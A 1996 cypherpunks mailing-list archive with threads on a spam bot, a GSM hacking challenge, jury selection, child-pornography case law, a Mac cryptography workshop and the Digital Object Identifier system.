			WebCrawler Select

----------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Thu, 12 Sep 1996 05:40:10 +0800
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: 'robert' and his 'hipcrime' web site
In-Reply-To: <199609111609.JAA25770@abraham.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.91.960911135757.5703A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996, John Anonymous MacDonald wrote:

> Have you considered who is funding this "hipcrime" site?  Web sites aren't
> terribly expensive these days, but someone paid at least a few hundred
> dollars in set-up fees for this.

A few hundred dollars?  Probably not.  There's the domain name 
registration (perhaps, depending on when the name was registered -- I 
don't care enough to find out), and maybe $20/month to some other guy.  
Perhaps more, but not necessarily.

> It's obvious that this guy's true passion is fractals and raytracing.  
> He threw in some bomb-making stuff, but he scanned it out of a book and
> probably never tried it.  Compared to the rest of the site, it looks like
> an afterthought.  Someone who was really interested in chemistry would
> have taken the time to retype the info and add their own comments.  He
> had a reason to have some "anarchist" info on there but he's not really
> interested in it.  So basically this guy is a mathematician/artist trying
> to pretend he's an anarchist.

Like... oh... I dunno... una-something... :-)  To be an "anarchist" has 
nothing to do with violence, necessarily, though.  Ghandi was an 
anarchist, of course, as are many other people (such as myself) who 
disclaim violence as a tactic.

> So we have a guy, probably with an education in mathematics, who likes
> abstract art.  Not what would generally be considered a political figure.
> But there's something else there - something that doesn't want to be seen,
> something that is very strongly law&order, something that doesn't
> understand the anarchy of the net, and fears it.

Disagree strongly.  Are you aware of the source of the name 'hipcrime'?  
It's from John Brunner's novel _Stand_On_Zanzibar_ (A _great_ book, btw), 
and describes a cynical, hipster-societal dropout philosophy (or at least 
style) that is inclined to look at people as no more than sheep. Applying 
this to the 'net populace is perhaps (I hesitate somewhat to apply the 
term) misanthropic, but not necessarily law & order.  Again, unabomber 
comparisons are obvious.

Still, like computer virii, the internet worm, all the promised 
intelligent agents and nano-mites we've been promised (which the hipcrime 
bot could certainly be seen as another precursor of, at least as far as 
intelligent agents go), there's a certain abstract beauty to the scheme, 
and a certain pathos.  I'm reminded of the limits to growth studies which 
showed islands exceed their capacity to carry a particular species, and 
the stunning sudden decline soon after.  (Come to think of it, that 
analogy might cover the remailer network)

----------
Jon Lasser (410)532-7138                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 12 Sep 1996 13:19:26 +0800
To: cypherpunks@toad.com
Subject: Re: Hacking Mobil Telephone System ?
Message-ID: <199609112119.OAA04402@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:13 PM 9/11/96 -6, Peter Trei wrote:

>
>The differences between US and European nomenclature can be subtle, yet
>important. Quick - which is likely to have had warmer weather: 1/8/96, or
>8/1/96?

Sorry to add more complication, but "northern or southern latitude?"
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: watson@tds.com
Date: Thu, 12 Sep 1996 11:50:03 +0800
To: cypherpunks@toad.com
Subject: Re: Court challenge to AOL junk-mail blocks
Message-ID: <199609112133.OAA08338@mailman.tds.com>
MIME-Version: 1.0
Content-Type: text/plain



NetSurfer said:  If you know a valid email address on the spammers system you can always
bounce each message back to them.  If enough people turned the messages
back on them it might give them the opportunity to experience first hand
what its like to receive tons of mail you don't want or need...

Doesn't seem to work that well.  The "green card lawyers" were reported
to have received hate-mail in the hundreds of thousands.  The happily waded
through it all and pulled out a few valid replies who apparently made it
all a net profit for them, apparently.  What we really need is to improve
our defensive filtering mechanisms.  Someday soon we'll all have our own
personal software agents that will handle all this stuff for us.

Optimistic Dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HipCrime <robert@precipice.v-site.net>
Date: Thu, 12 Sep 1996 11:56:01 +0800
To: cypherpunks@toad.com
Subject: [Fwd: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]]
Message-ID: <32373072.3E41@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain

Does this maillist filter out messages from NON-subscribers?


To: HipCrime <robert@precipice.V-site.net>
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
From: Admin <admin@superhot.com>
Date: Wed, 11 Sep 1996 15:14:26 -0600
Cc: CYPERPUNKS@TOAD.COM, Geoff White <geoffw@precipice.V-site.net>,       <julf@penet.fi>, jlasser@rwd.goucher.edu

At 01:52 PM 9/11/96 -0700, you wrote:
This is an absurd and inaccurate analogy. The mailBot simply pushes
*mailto:* tags that people have willingly placed on their public websites.
They invite the mail so a more accurate analogy would be that City Hall puts
up a public suggestion box and invites comments. The bot then puts one, and
only one, unsigned anonymous suggestion into the box. It then goes on to the
Art Gallery where they too have put up a public suggestion box, and the bot
places one, and only one, anonymous suggestion in that box also...and it
moves on to the next publicly accessable suggestion box that it finds, each
time putting in one, and only one, message.

Can the College-aged mind these days not develop a rational, concise,
accurate and logical analogy that stays on point?

Think about it... or take down the public suggestion boxes if one doesn't
like what one finds inside. If you invite feedback...it will come.

admin


There is
>
>HipCrime <na673130@anon.penet.fi> wrote:
>> Be honest, all you really care about is something which
>> "threatens the existence" your little baby.
>
>I think you were referring to yourself, Robert.  :)
>
>
>Since you don't seem to understand the concept of spam very well yet,
>try this little experiment:
>
>Go downtown to City Hall and post advertisements for your website on
>all the walls and doors.  Be sure to put one on the Mayor's office and
>all the members of the City Council.  If they complain, explain to them
>why they are weak-minded souls who can't remove unwanted messages.
>
>Go to the local art gallery and post your signs all over.  Tell people
>that since your web site is an "art project", that you are posting EXACTLY
>on topic, to an "appropriate group".  Ask, "So, what's your problem ?!?"
>
>Pass out survey forms.  Ask people where they want to see advertisements.
>Go to these sites and spray-paint your http address.  If people complain
>that you are "harassing" them, ask them why a whopping eighteen letters
>written on the wall is harassment.  Tell them it's not *your* fault,
>that you're just doing what other people told you to.  Explain how many
>trees you are saving by using spray-paint instead of paper.
>
>When the police handcuff you and take you away, complain that they are
>censoring you.  Tell the judge that you want to sue the cops for violating
>your civil rights.  While you're in jail, think about why what you did
>was wrong.
>
<>________________Lowest_Priced_Long_Distance__________________<>
||Long Distance 9.9¢/min           |Helping hardworking people ||
||9.9¢ Anytime, Anywhere in US!    |like yourself pay the      ||
||Free sign-up, 6 second billing   |lowest possible price for  ||
||http://www.superhot.com/phone    |high quality LD service.   ||
<>-----------------------1_303_692_5190------------------------<>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Thu, 12 Sep 1996 11:59:31 +0800
To: cypherpunks@toad.com
Subject: NewsBytes ****Singapore - Leased Line Customers Bypass Censorship
Message-ID: <199609112142.RAA23085@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


****Singapore - Leased Line Customers Bypass Censorship
        By Martyn Williams. Individual users of the Internet in Singapore 
        may not be able to access the latest online images from Playboy 
        after next Monday, but those at major corporations and large companies
        will find no restrictions to their World Wide Web surfing. [Newsbytes,

(I just have the header, not the full article; sorry.)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Thu, 12 Sep 1996 06:16:02 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Hacking Mobil Telephone System ?
In-Reply-To: <Pine.SCO.3.93.960911111553.16740A-100000@grctechs.va.grci.com>
Message-ID: <rogerk9u0zvgo.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Mark O Aldrich <maldrich@grci.com> writes:
  > On Wed, 11 Sep 1996, Stephan Schmidt wrote:

  >> If a hacker is able to phone using the number
  >> 0171 / 3 28 99 66 in Germany with a hacked code,
  >> the company will pay 100.000 DM (~65.000$) to a non
  >> profit organisation of the hackers choice.

  > ... I'd also expect to get paid a hell of
  > a lot more than $65 for doing a penetration test on their network.  Sixty
  > five bucks won't even pay the per diem, none the less a reasonable wage.

Um, that's 65 *thousand* bucks, which should pay the per diem for a
week or so... ;-)

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Thu, 12 Sep 1996 02:26:50 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: TWA 800 - Serious thread.
In-Reply-To: <32367F80.41C67EA6@systemics.com>
Message-ID: <Pine.SUN.3.95.960911144448.19567K-100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996, Gary Howland wrote:

> > But the public *is* asked to assent to those methods - your chance to vote
> > on them is known colloquially as "jury duty".

	But judges have said that Jury Nullification is not acceptable
	legal practice.

> Ah, but isn't "jury selection" the process of selecting those that don't
> know they are judging the law as well as the case?

	You forgot something else.

	Jury Selection also involves the removal from the jury any
	individual who might have some knowledge about anything which
	might be relevent to the case.

	So the only people on juries are those who are unemployed,
	on uneducated or usually both.  That they are easilly manipulated
	is a further virtue, from the POV of the Injustice system the US 
	has. 

        xan

        jonathon
        grafolog@netcom.com


		The one who does nothing 
			can win over the one who rushes around
			to all the things.

		The one who is gentle 
			can win over the one who is strong.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 12 Sep 1996 08:46:04 +0800
To: cypherpunks@toad.com
Subject: The definition of child pornography -- no help here
Message-ID: <v01510109ae5cc70bdc2e@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


[Note this was before Knox. --Declan]


                               NEW YORK v. FERBER

                                   No. 81-55

                       SUPREME COURT OF THE UNITED STATES

          458 U.S. 747; 102 S. Ct. 3348; 1982 U.S. LEXIS 12; 73 L. Ed.
                2d 1113; 50 U.S.L.W. 5077; 8 Media L. Rep. 1809


                           April 27, 1982, Argued
                             July 2, 1982, Decided

PRIOR HISTORY:   [***1]

   CERTIORARI TO THE COURT OF APPEALS OF NEW YORK.

DISPOSITION: 52 N. Y. 2d 674, 422 N. E. 2d 523, reversed and remanded.

SYLLABUS:  A New York statute prohibits persons from knowingly promoting a
sexual performance by a child under the age of 16 by distributing material which
depicts such a performance.  The statute defines "sexual performance" as any
performance that includes sexual conduct by such a child, and "sexual conduct"
is in turn defined as actual or simulated sexual intercourse, deviate sexual
intercourse, sexual bestiality, masturbation, sado-masochistic abuse, or lewd
exhibition of the genitals.  Respondent bookstore proprietor was convicted under
the statute for selling films depicting young boys masturbating, and the
Appellate Division of the New York Supreme Court affirmed.  The New York Court
of Appeals reversed, holding that the statute violated the First Amendment as
being both underinclusive and overbroad.  The court reasoned that in light of
the explicit inclusion of an obscenity standard in a companion statute banning
the knowing dissemination of similarly defined material, the statute in question
could not be construed to include an obscenity standard,   [***2]   and
therefore would prohibit the promotion of materials traditionally entitled to
protection under the First Amendment.

   Held: As applied to respondent and others who distribute similar material,
the statute in question does not violate the First Amendment as applied to the
States through the Fourteenth Amendment.  Pp. 753-774.

   (a) The States are entitled to greater leeway in the regulation of
pornographic depictions of children for the following reasons: (1) the
legislative judgment that the use of children as subjects of pornographic
materials is harmful to the physiological, emotional, and mental health of the
child, easily passes muster under the First Amendment; (2) the standard of
Miller v. California, 413 U.S. 15, for determining what is legally obscene is
not a satisfactory solution to the child pornography problem; (3) the
advertising and selling of child pornography provide an economic motive for and
are thus an integral part of the production of such materials, an activity
illegal throughout the Nation; (4) the value of permitting live performances and
photographic reproductions of children engaged in lewd exhibitions is
exceedingly modest, if  [***3]   not de minimis; and (5) recognizing and
classifying child pornography as a category of material outside the First
Amendment's protection is not incompatible with this Court's decisions dealing
with what speech is unprotected.

[...]

******

               Copyright (c) 1994 Albany Law Journal of Science &
                                   Technology
                   Albany Law Journal of Science & Technology

                                      1994

                          4 Alb. L.J. Sci. & Tech. 311

LENGTH: 10368 words

COMMENTS: WHY THE POSSESSION OF COMPUTER-GENERATED CHILD PORNOGRAPHY CAN BE
CONSTITUTIONALLY PROHIBITED

 David B. Johnson

TEXT:
[*312]

    I. INTRODUCTION

    The computer revolution is sweeping across the world. Like the Industrial
Revolution of the nineteenth and early twentieth century, the computer has
brought and will continue to bring profound changes to our society. In many
instances, computer technology has advanced faster than the laws governing it.
n1 Some critics fear that computer technology is growing so fast that "society
will be . . . unprepared [to deal with] the moral and legal havoc it will create
and the questions it will pose for human identity and privacy." n2 The computer
revolution already has brought society its fair share of moral and legal havoc.
n3 However, what is to come will tax society's moral and legal systems on an
even greater scale.

[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 12 Sep 1996 02:39:48 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Conjuring up the latest utopia for a minoritarian sect of illuminati
In-Reply-To: <ae5ba32805021004b044@[207.167.93.63]>
Message-ID: <199609111509.JAA14414@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


        Ah, but Dr. Dimitri, * I * did place you in my "drop" filter
long 
    enough ago that I even forget why --and I have see no reason 
    to change that decision from the various postings in your hand 
    which have been made part of another's reply.

        --attila

--
  Politicians are like diapers.
    They both need changing regularly, and for the same reason.

    --- original message follows ---

In <ae5ba32805021004b044@[207.167.93.63]>, on 09/10/96 
   at 10:52 PM, tcmay@got.net (Timothy C. May) said:

=   At 1:46 AM 9/11/96, Dr.Dimitri Vulis KOTM wrote:

= >  tcmay@got.net (Timothy C. May) writes:
= > > I didn't call for your "expulsion." No one has been expelled in
= > > four years  of the list's existence.
= >
= > However Tim has been complaining about my postings to 
= > various people I know and respect. (I stopped respecting 
= > Tim years ago.)

= And who might these people be? I suggest you name them, as 
= I have not even mentioned your name to anyone. You don't 
= rate a complaint from me.

=--TCM






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 12 Sep 1996 08:59:24 +0800
To: cypherpunks@toad.com
Subject: Mac Crypto Conf - Debrief
Message-ID: <v03007802ae5cbedba3a2@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Mime-Version: 1.0
Date: Tue, 10 Sep 1996 17:57:05 -0700
To: mac-crypto@thumper.vmeng.com
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Subject: Mac Crypto Conf - Debrief

Yow! - We did it....

On Sept 5th & 6th, here on the Cupertino R&D Campus, Robert Hettinga from
Shipwright and I ran "The First-Ever-Last-Minute-Under-the-Radar-
Ask-Forgiveness-but-Not-Permission Macintosh Cryptography and Internet
Commerce Software Development Workshop"

This workshop was driven by the copious feedback that I have recieved from
developers from both DTS and personal emails, WWDC and MacHack and the
Mac-Crypto mailing list.

Since the  ability to perform Internet Commerce depends heavly on both
networking and cryptographic technologies. I started the Mac-Crypto mailing
list last March to discuss the implementation of cryptography on the MacOS.

We had three major goals for this event:

1) We wanted to provide a vehicle to educate Apple developers and employees
who are responsible for Apple's future on the internet about what is going
on in the Internet commerce world. We also felt the need to get Internet
commerce on Apple's radar. It was clearly on Microsoft's agenda. Developer
feedback made it  loud and clear that we are losing and have lost
developers to other platforms because of it. We are going to fix that.

2) To assist in bridging any disconnect between what the developers have
been asking us for and what we are giving them in the internet commerce
world.

3) To provide a forum where developers can work together to create internet
commerce products for the Macintosh platform. In a manner similar to
Quinn's Internet Config, we belived that a lot of this infrastructure can
be built by the developers themselves.

Highlights:

I posted an invite webpage at
http://webstuff.apple.com/~opentpt/crypto.html and advertised on several
mailing lists, within 10 days I had 84 registrations, about 70 of which
showed. Some attendees actually traveled from as far as Scotland.

The sessions (in no particular order):

* Phil Zimmerman / PGP Inc     - Keynote.
* Bill Frantz / Periwinkle     - Introduction to Cryptography
* Maxine Curry / Apple         - Crypto Software and the Commerce Dept.
* Jon Callas / Apple           - Random Numbers on the Mac
* Pablo Calamera / Apple       - Feedback: Mac Crypto API?:
* Sari Harrison / Apple        - Feedback: Internet API?
* Vinnie Moscaritolo / Apple   - Building Fast Network Server Software on MacOS
* Quinn / Apple                - Internet Config as a Development Model
* Vinnie Moscaritolo / Apple   - Proposal for bringing back the Mac Keychain
* Jay Van Vark / Pacific Coast - How to use electronic commerce
* Michel Ranger / Entrust      - Certificate and  Trust Management
* Marc Briceno/Digicash        - Digital Cash and Digital Bearer Certificates
* Robert Hettinga / Shipwright - A look over the edge
* Dave Del Torto               - Cypherpunks, MCIP and Mac-Crypto:
  Marshall Clow                   a history of crypto activism and the Mac
  Greg Broiles

The sessions were a real sucess. There was a lot of enthusiasm from the
developers. The speakers were great. I received comments that the
developers found the workshop was very accessible; there was a lot of
interaction between the audience and speakers. We allocated plenty of time
for Q&A and discussions. They wished that WWDC was more like this.

Some of the highlights were:

- Phil Zimmerman of PGP fame talked about his plans to build a commercial
version of PGP,PGPPhone and CryptDisk on the Mac. And a Mac PGP library
that developers can use in their products.

- Jon Callas's session generated much excitement. Developers appreciated
that his work will be available in source code.

- Quinn's session described the hurdles he encountered in shipping Internet
Config, one of the most successful pieces of mac software. I would consider
this talk a must-watch for any evangelist or product mgr, there is a lot
Apple can learn from him.

- Sari and Pablo seemed to restored some faith to developers that Apple
does listen to their concerns. I got a lot of positive feedback about their
willingness to listen to developers.

- I gave a talk about what is involved in designing fast network servers
with OpenTransport. I wanted to remove any misconception that MacOS is not
a good server platform. I outlined the workarounds to some of the problems
that existing products have encounted. Thanks to the feedback I received I
plan to give this talk again to Apple engineers.

- Marc from DigiCash was very knowledgeable about uses for digital cash.
One that I was surprised by was to drastically lower bookkeeping costs from
internal corporate budget management.  Here is an place where Apple could
lead.

- Robert Hettinga gave a great lecture on the future of commerce and money
on the net. It's impossible to talk to him for 10 minutes and not learn
something. He is a "natural born evangelist"  and would be a great asset to
Apple.

- Sidhu voluteered to lead an effort to resurect a developers accessable
keychain that can be used  as a single log-in point to secure services.

- There were even a few impromptu sessions from the developers. I wished
that more Apple folks could have been there to absorb some of the developer
feedback.

Luckily Bob and I also worked the video room in between giving our sessions
and introductions  and were able to tape most of the  sessions.  I am
working on making them available. I will also try to make the slides
available on a more permanent webpage in a few days. (I'll post on Mac
Crypto)

Kudos

I want very much to thank the individuals that made this workshop possible.

* Robert Hettinga from Shipwright - For his personal time and cost to fly
out from Boston, mustering up the developers on the net, assembling the
talks, giving the talks, educating us all,  doing video booth duty, and
everything else. Imagine what we could do with an army of folks like you.
(scares me)

* Jose Carreon - For understanding the importance and internet commerce to
Apple's future and arranging what was needed to make this event happen.

* Beth Reed /  Yolanda Saldana / Robin Wagner / Richard Ford -  For all the
help organizing coordinating and firefighting behind the scenes (and
holding the bail money).  We wouldn't have been able to do it without you.

* Cynthia Zwerling - for the fantastic artwork, web design, T-Shirts, and
for dealing with all our last minute notices.

* And a personal thanks to all the speakers, for taking the time off their
busy schedules to give great presentations.

* And most of all, a big thank you to the developers for believing in Apple.

Ciao.



Vinnie Moscaritolo
Apple Developer Tech Support
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 12 Sep 1996 08:19:07 +0800
To: schmidt@pin.de
Subject: Re: Hacking Mobil Telephone System ?
Message-ID: <199609111913.MAA16800@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 11 Sep 1996, Stephan Schmidt wrote:
> 
> > The German Company MobilCom wants to proove
> > that the German GSM networks D1,D2 and E+ are
> > secure.
> > 
> <snip>
> > 
> > If a hacker is able to phone using the number
> > 0171 / 3 28 99 66 in Germany with a hacked code,
> > the company will pay 100.000 DM (~65.000$) to a non
> > profit organisation of the hackers choice.
> > 
> > Is someone able to do this ? :)
> 
> While there's dubious wisdom in trying to tell Der Polizei, "I was just
> responding to an authorization that I found on the Internet that says it's
> OK to phreak your phones - honest," I'd also expect to get paid a hell of
> a lot more than $65 for doing a penetration test on their network.  Sixty
> five bucks won't even pay the per diem, none the less a reasonable wage.
> And Der Polizei is *NOT* known for having a sense of humor about anything,
> at any time, with anyone.  Remember, kids, they may look like shit in
> uniform, but those automatic weapons they carry are real, so's the ammo,
> and they know how to use both of 'em.

The simple solution is to call the number from a regular phone, and find
out if the offer is correct.

I think you'll find that '100.000 DM (~65.000$)' is European nomenclature
for '100,000 DM (~65,000$).

The differences between US and European nomenclature can be subtle, yet
important. Quick - which is likely to have had warmer weather: 1/8/96, or
8/1/96?



 


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Admin <admin@superhot.com>
Date: Thu, 12 Sep 1996 08:35:56 +0800
To: cypherpunks@toad.com
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <199609112124.PAA11039@rintintin.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




>This is an absurd and inaccurate analogy. The mailBot simply pushes
>*mailto:* tags that people have willingly placed on their public websites.
>They invite the mail so a more accurate analogy would be that City Hall puts
>up a public suggestion box and invites comments. The bot then puts one, and
>only one, unsigned anonymous suggestion into the box. It then goes on to the
>Art Gallery where they too have put up a public suggestion box, and the bot
>places one, and only one, anonymous suggestion in that box also...and it
>moves on to the next publicly accessable suggestion box that it finds, each
>time putting in one, and only one, message.
>
>Can the College-aged mind these days not develop a rational, concise,
>accurate and logical analogy that stays on point?
>
>Think about it... or take down the public suggestion boxes if one doesn't
>like what one finds inside. If you invite feedback...it will come.
>
>admin
>
>
>There is
>>
>>HipCrime <na673130@anon.penet.fi> wrote:
>>> Be honest, all you really care about is something which
>>> "threatens the existence" your little baby.
>>
>>I think you were referring to yourself, Robert.  :)
>>
>>
>>Since you don't seem to understand the concept of spam very well yet,
>>try this little experiment:
>>
>>Go downtown to City Hall and post advertisements for your website on
>>all the walls and doors.  Be sure to put one on the Mayor's office and
>>all the members of the City Council.  If they complain, explain to them
>>why they are weak-minded souls who can't remove unwanted messages.
>>
>>Go to the local art gallery and post your signs all over.  Tell people
>>that since your web site is an "art project", that you are posting EXACTLY
>>on topic, to an "appropriate group".  Ask, "So, what's your problem ?!?"
>>
>>Pass out survey forms.  Ask people where they want to see advertisements.
>>Go to these sites and spray-paint your http address.  If people complain
>>that you are "harassing" them, ask them why a whopping eighteen letters
>>written on the wall is harassment.  Tell them it's not *your* fault,
>>that you're just doing what other people told you to.  Explain how many
>>trees you are saving by using spray-paint instead of paper.
>>
>>When the police handcuff you and take you away, complain that they are
>>censoring you.  Tell the judge that you want to sue the cops for violating
>>your civil rights.  While you're in jail, think about why what you did
>>was wrong.
<>________________Lowest_Priced_Long_Distance__________________<>
||Long Distance 9.9¢/min           |Helping hardworking people ||
||9.9¢ Anytime, Anywhere in US!    |like yourself pay the      ||
||Free sign-up, 6 second billing   |lowest possible price for  ||
||http://www.superhot.com/phone    |high quality LD service.   ||
<>-----------------------1_303_692_5190------------------------<>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: live@excite.com
Date: Thu, 12 Sep 1996 09:33:17 +0800
Subject: Your Excite Live! page
Message-ID: <199609112256.PAA19540@jiff.>
MIME-Version: 1.0
Content-Type: text


A request was made for the location of your Excite Live! page

Found your Excite Live at URL
http://live.excite.com/?uid=CEC8C99632372D6E






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 12 Sep 1996 09:48:37 +0800
To: cypherpunks@toad.com
Subject: RRE: Digital Objects Identifiers
Message-ID: <01I9CWTXLIZC9ULNWE@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu" 10-SEP-1996 23:06:58.45

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Mon, 9 Sep 1996 15:59:26 -0400 (EDT)
From: Paul Evan Peters <paul@cni.org>
To: Multiple recipients of list <cni-announce@cni.org>
Subject: Digital Objects Identifiers

Dear CNI-Announce subscribers:

I thought that you would like to have the attached brought
to your attention, especial so since:

o it deals with a critical technical issue in the evolution 
  of the networked information environment, and

o involves the Association of American Publishers (AAP) and 
  the Corporation for National Research Initiatives (CNRI), 
  two organizations with which CNI collaborates from time to 
  time, as well as

o Reed Elsevier, Inc., the parent corporation of Elsevier 
  Science B.V., a member of the CNI Task Force.

Best,

Paul

Paul Evan Peters                                           paul@cni.org
Executive Director                                     fax 202-872-0884
Coalition for Networked Information                        202-296-5098
21 Dupont Circle                                     ftp://ftp.cni.org/
Washington, DC 20036                        gopher://gopher.cni.org:70/
USA                                http://www.cni.org/CNI.homepage.html

CONTACT:  Judith Platt: 202-232-3335, ext. 229
                        jplatt@publishers.org

Washington, D.C.  September 9, 1996

TEAM SELECTED TO DEVELOP DIGITAL OBJECT IDENTIFIER
SYSTEM FOR PUBLISHING INDUSTRY

The Association of American Publishers (AAP) today announced
selection of the team that will develop a Digital Object Identifier (DOI)
system for use by the publishing industry.  The team,  comprising
R.R. Bowker, a division of Reed Elsevier, Inc., and the Corporation
for National Research Initiatives (CNRI),  was chosen following a
competitive bidding process initiated last spring as part of AAP's
all-out effort to promote development of systems for managing
copyright in the digital environment.  Copyright management is
seen as the key to successful commercial use of the Internet by the
publishing industry.

The DOI project is the outgrowth of a year-long AAP initiative to
identify the needs of the publishing industry to facilitate safe and
successful commercial ventures on the Internet and in other networked
environments.   AAP's initial research revealed a fundamental need
for a unique, unambiguous way to identify digital materials-- a type
of "electronic license plate" for a "digital vehicle" traveling the
information superhighway. The Digital Object Identifier system will
serve that purpose.

The Bowker/CNRI team will focus on three key areas during the first
year: developing a numbering system for identifying digital objects
created by publishers; creating an agency for assigning publisher numbers;
and developing a network-based directory to link digital objects to
their publisher.   DOIs will be made accessible via a high-speed computer
system developed by CNRI--a scalable, distributed system on the Internet,
with open interfaces, allowing information about digital material to be
retrieved almost instantaneously.  R.R. Bowker will establish the
agency for making publisher numbers and other related information
available to any and all publishers.  Since the DOI system uses open
standards, publishers and other companies can build their own
products and services based around DOIs.

AAP President Nicholas Veliotes said that "In selecting the team to
develop a DOI system, AAP is taking a major step forward in the search
for viable, effective copyright management in the electronic
environment.  Our members see this as a top priority as the publishing
industry positions itself for the new Century."

Robert Badger (Springer Verlag NY), a member of AAP's Enabling
Technologies Committee and head of its DOI task force, pointed out:
"For people to buy and sell information on the Internet, the publishing
community needs two things which this announcement sets in motion.
First, we need a simple way to identify which piece of information
is being purchased; that's what the number does. Second, we need an
easy way for the reader to get current information about the digital
object--and this system will accomplish that by directing the reader's
question immediately to the right place in the publishing organization.
It's more than just a Universal Product Code for information; it's a
market-making mechanism."

Robert Kahn, President of CNRI and a recognized pioneer in the
development of the Internet, said "We are delighted that our technology
was selected for this important application. It will provide a key
component of the global information infrastructure and can serve
as a model for information access across many sectors of the economy."

R.R. Bowker's Publisher Peter Simon noted that "As the organization
that runs the ISBN Agency in the United States, and the publisher of
key tools for locating published materials (including the preeminent
Books in Print database), we are very pleased to be contributing our
experience and expertise to creating new standards for digital materials
and facilitating commerce on the Internet for the publishing industry."

The Association of American Publishers is the principal trade
association of the U.S. book publishing industry.  Its members publish
hardcover and paperback books in every field, including general
fiction and non-fiction, poetry, children's books, textbooks, Bibles,
reference works, scientific, medical, technical, professional, and
scholarly books and journals, and a range of educational materials
for the elementary, secondary, postsecondary and professional
markets.  AAP members also produce computer software and
electronic products and services, including online databases and
CD-ROM.  Among AAP's primary concerns is the protection of
intellectual property rights at home and abroad, in all media.

R.R. Bowker, a division of Reed Elsevier, Inc., is one of the foremost
U.S. bibliographic publishers, providing reference information to
libraries, booksellers, and publishers since 1872.   Its Books in Print
database is currently available in hard copy, CD-ROM, tape & site
license, and online.  In addition, Bowker is the independent agent
in the U.S. for the International ISBN and SAN systems.  The ISBN
is an identification system for books and other media which allows
for order processing by booksellers, libraries, universities, wholesalers
and distributors.  DOI project contact at Bowker is Maureen Adamson,
Vice President, Business Development--(908) 665-2856;
madamson@reedref.com.

The Corporation for National Research Initiatives is an
internationally recognized leader in information technology research
and development, with particular strength in networking, large-scale
information systems, and digital object infrastructure. A non-profit
organization formed in 1986 to foster research and development
for a national information infrastructure, CNRI has, since its
inception, been actively engaged in the establishment of open,
non-proprietary technological approaches for networked systems.
